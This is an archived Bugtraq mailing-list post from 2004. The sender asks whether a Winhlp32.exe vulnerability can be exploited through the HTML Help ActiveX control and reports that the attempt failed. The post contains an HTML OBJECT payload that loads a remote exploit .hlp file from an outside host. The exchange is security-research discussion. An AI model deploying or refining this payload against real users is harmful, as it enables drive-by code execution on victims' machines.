[37988] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

New Winhlp32.exe vuln

daemon@ATHENA.MIT.EDU (bad_son@pimp.it)
Sat Dec 25 15:37:20 2004

Message-ID: <1159.70.112.84.30.1103932432.squirrel@www.redhive.com>
Date: Fri, 24 Dec 2004 18:53:52 -0500 (EST)
From: <bad_son@pimp.it>
To: <bugtraq@securityfocus.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

Can this vulnerability be exploited using the HTML help ActiveX control ?

I am trying:
<OBJECT
   id=winhelp
   type="application/x-oleobject"
   classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
   codebase="hhctrl.ocx#Version=5,02,3790,1194"
   width=100
   height=100
>
   <PARAM name="Command" value="WinHelp">
   <PARAM name="Button" value="Text:Exploit">
   <PARAM name="Item1"
value="http://www.xfocus.net/flashsky/icoExp/search.hlp">MyWindow">

</OBJECT>

However, i get an error "This operation is allowed only within HTML help" ?

Is this approach wrong ?


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[37988] in bugtraq

New Winhlp32.exe vuln

daemon@ATHENA.MIT.EDU (bad_son@pimp.it)Sat Dec 25 15:37:20 2004

daemon@ATHENA.MIT.EDU (bad_son@pimp.it)
Sat Dec 25 15:37:20 2004